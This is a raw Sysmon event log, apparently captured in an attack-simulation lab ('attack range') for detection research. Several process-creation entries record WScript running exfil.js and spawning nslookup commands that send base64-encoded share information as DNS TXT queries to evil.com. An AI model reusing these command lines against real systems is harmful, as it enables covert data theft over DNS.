14:16:32.213{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.212{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8940-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.212{2E1864BB-17A1-629A-783D-000000005F02}55524836C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-8940-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.210{2E1864BB-17C0-629A-8940-000000005F02}6888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpzpuws.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.194{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrid.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000200636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{00000000-0000-0000-0000-000000000000}2040<unknown process>-udpfalsefalse127.0.0.1-52709-false127.0.0.1-53domain 354300x8000000000000000200635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.823{00000000-0000-0000-0000-000000000000}8000<unknown process>-udpfalsefalse127.0.0.1-52708-false127.0.0.1-53domain 354300x8000000000000000200634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.642{00000000-0000-0000-0000-000000000000}6044<unknown process>-udptruefalse127.0.0.1-52704-false127.0.0.1-53domain 354300x8000000000000000200633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.641{00000000-0000-0000-0000-000000000000}6044<unknown process>-udpfalsefalse127.0.0.1-52702-false127.0.0.1-53domain 354300x8000000000000000200632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.476{00000000-0000-0000-0000-000000000000}6148<unknown process>-udpfalsefalse127.0.0.1-52701-false127.0.0.1-53domain 354300x8000000000000000200631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.476{00000000-0000-0000-0000-000000000000}6148<unknown process>-udpfalsefalse127.0.0.1-52700-false127.0.0.1-53domain 354300x8000000000000000200630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.475{00000000-0000-0000-0000-000000000000}6148<unknown process>-udptruefalse127.0.0.1-52700-false127.0.0.1-53domain 354300x8000000000000000200629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.342{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-52698-false127.0.0.1-53domain 354300x8000000000000000200628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.341{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-52698-false127.0.0.1-53domain 354300x8000000000000000200627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.341{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-52697-false127.0.0.1-53domain 354300x8000000000000000200626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.335{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-52696-false127.0.0.1-53domain 354300x8000000000000000200625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.334{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-52696-false127.0.0.1-53domain 354300x8000000000000000200624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.169{00000000-0000-0000-0000-000000000000}7172<unknown process>-udpfalsefalse127.0.0.1-52695-false127.0.0.1-53domain 354300x8000000000000000200623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.169{00000000-0000-0000-0000-000000000000}7172<unknown process>-udptruefalse127.0.0.1-52695-false127.0.0.1-53domain 354300x8000000000000000200622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.169{00000000-0000-0000-0000-000000000000}7172<unknown process>-udpfalsefalse127.0.0.1-52694-false127.0.0.1-53domain 354300x8000000000000000200621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.168{00000000-0000-0000-0000-000000000000}7172<unknown process>-udptruefalse127.0.0.1-52694-false127.0.0.1-53domain 354300x8000000000000000200620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.167{00000000-0000-0000-0000-000000000000}7172<unknown process>-udpfalsefalse127.0.0.1-52693-false127.0.0.1-53domain 354300x8000000000000000200619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.166{00000000-0000-0000-0000-000000000000}7172<unknown process>-udptruefalse127.0.0.1-52693-false127.0.0.1-53domain 354300x8000000000000000200618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{00000000-0000-0000-0000-000000000000}5744<unknown process>-udpfalsefalse127.0.0.1-52692-false127.0.0.1-53domain 354300x8000000000000000200617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{00000000-0000-0000-0000-000000000000}5744<unknown process>-udpfalsefalse127.0.0.1-52691-false127.0.0.1-53domain 354300x8000000000000000200616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{00000000-0000-0000-0000-000000000000}5744<unknown process>-udptruefalse127.0.0.1-52691-false127.0.0.1-53domain 354300x8000000000000000200615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{00000000-0000-0000-0000-000000000000}5744<unknown process>-udptruefalse127.0.0.1-52690-false127.0.0.1-53domain 354300x8000000000000000200614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.836{00000000-0000-0000-0000-000000000000}5332<unknown process>-udpfalsefalse127.0.0.1-52689-false127.0.0.1-53domain 354300x8000000000000000200613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.836{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-52689-false127.0.0.1-53domain 354300x8000000000000000200612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.729{00000000-0000-0000-0000-000000000000}4740<unknown process>-udpfalsefalse127.0.0.1-52688-false127.0.0.1-53domain 354300x8000000000000000200611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.728{00000000-0000-0000-0000-000000000000}4740<unknown process>-udptruefalse127.0.0.1-52688-false127.0.0.1-53domain 354300x8000000000000000200610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.728{00000000-0000-0000-0000-000000000000}4740<unknown process>-udptruefalse127.0.0.1-52687-false127.0.0.1-53domain 354300x8000000000000000200609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.728{00000000-0000-0000-0000-000000000000}4740<unknown process>-udpfalsefalse127.0.0.1-52686-false127.0.0.1-53domain 354300x8000000000000000200608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.727{00000000-0000-0000-0000-000000000000}4740<unknown process>-udptruefalse127.0.0.1-52686-false127.0.0.1-53domain 354300x8000000000000000200607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.618{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-52685-false127.0.0.1-53domain 354300x8000000000000000200606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.618{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-52685-false127.0.0.1-53domain 354300x8000000000000000200605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.618{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-52684-false127.0.0.1-53domain 354300x8000000000000000200604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.617{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-52684-false127.0.0.1-53domain 354300x8000000000000000200603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.617{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-52683-false127.0.0.1-53domain 354300x8000000000000000200602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.617{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-52683-false127.0.0.1-53domain 354300x8000000000000000200601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{00000000-0000-0000-0000-000000000000}608<unknown process>-udpfalsefalse127.0.0.1-52682-false127.0.0.1-53domain 354300x8000000000000000200600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{00000000-0000-0000-0000-000000000000}608<unknown process>-udptruefalse127.0.0.1-52682-false127.0.0.1-53domain 354300x8000000000000000200599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{00000000-0000-0000-0000-000000000000}608<unknown process>-udpfalsefalse127.0.0.1-52681-false127.0.0.1-53domain 10341000x8000000000000000200598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-17C0-629A-8740-000000005F02}65087416C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8840-000000005F02}2608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8840-000000005F02}2608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.163{2E1864BB-17C0-629A-8640-000000005F02}50645920C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-8840-000000005F02}2608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.169{2E1864BB-17C0-629A-8840-000000005F02}2608C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-8640-000000005F02}5064C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrid.tmp 2>&1 10341000x8000000000000000200590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.132{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8740-000000005F02}6508C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.132{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8740-000000005F02}6508C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.116{2E1864BB-17C0-629A-8740-000000005F02}65087416C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8640-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.116{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8740-000000005F02}6508C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.110{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.110{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.110{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8640-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.094{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 